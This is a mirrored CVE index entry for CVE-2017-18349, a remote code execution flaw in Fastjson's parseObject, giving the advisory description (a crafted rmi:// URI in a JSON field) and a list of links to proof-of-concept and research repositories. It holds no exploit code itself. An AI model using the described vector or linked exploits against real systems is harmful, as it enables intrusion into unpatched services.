mirror of
https://github.com/0xMarcio/cve.git
synced 2026-05-25 12:44:05 +02:00
0xMarcio
45 lines
1.9 KiB
Markdown
45 lines
1.9 KiB
Markdown
### [CVE-2017-18349](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18349)
|
|
|
|
|
|
|
|
|
|
### Description
|
|
|
|
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
|
|
|
|
### POC
|
|
|
|
#### Reference
|
|
- https://fortiguard.com/encyclopedia/ips/44059
|
|
|
|
#### Github
|
|
- https://github.com/ARPSyndicate/cve-scores
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/CLincat/vulcat
|
|
- https://github.com/Nickel-Angel/lingxi-server
|
|
- https://github.com/PAGalaxyLab/VulInfo
|
|
- https://github.com/ReAbout/audit-java
|
|
- https://github.com/W01fh4cker/LearnFastjsonVulnFromZero-Basic
|
|
- https://github.com/bigblackhat/oFx
|
|
- https://github.com/g1san/Agents-for-Vulnerable-Dockers-and-related-Benchmarks
|
|
- https://github.com/h0cksr/Fastjson--CVE-2017-18349-
|
|
- https://github.com/happycao/lingxi-server
|
|
- https://github.com/hinat0y/Dataset1
|
|
- https://github.com/hinat0y/Dataset10
|
|
- https://github.com/hinat0y/Dataset11
|
|
- https://github.com/hinat0y/Dataset12
|
|
- https://github.com/hinat0y/Dataset2
|
|
- https://github.com/hinat0y/Dataset3
|
|
- https://github.com/hinat0y/Dataset4
|
|
- https://github.com/hinat0y/Dataset5
|
|
- https://github.com/hinat0y/Dataset6
|
|
- https://github.com/hinat0y/Dataset7
|
|
- https://github.com/hinat0y/Dataset8
|
|
- https://github.com/hinat0y/Dataset9
|
|
- https://github.com/junesi513/AVR_Agent
|
|
- https://github.com/luckyfuture0177/VULOnceMore
|
|
- https://github.com/openx-org/BLEN
|
|
- https://github.com/pan2013e/ppt4j
|
|
- https://github.com/qiuluo-oss/Tiger
|
|
|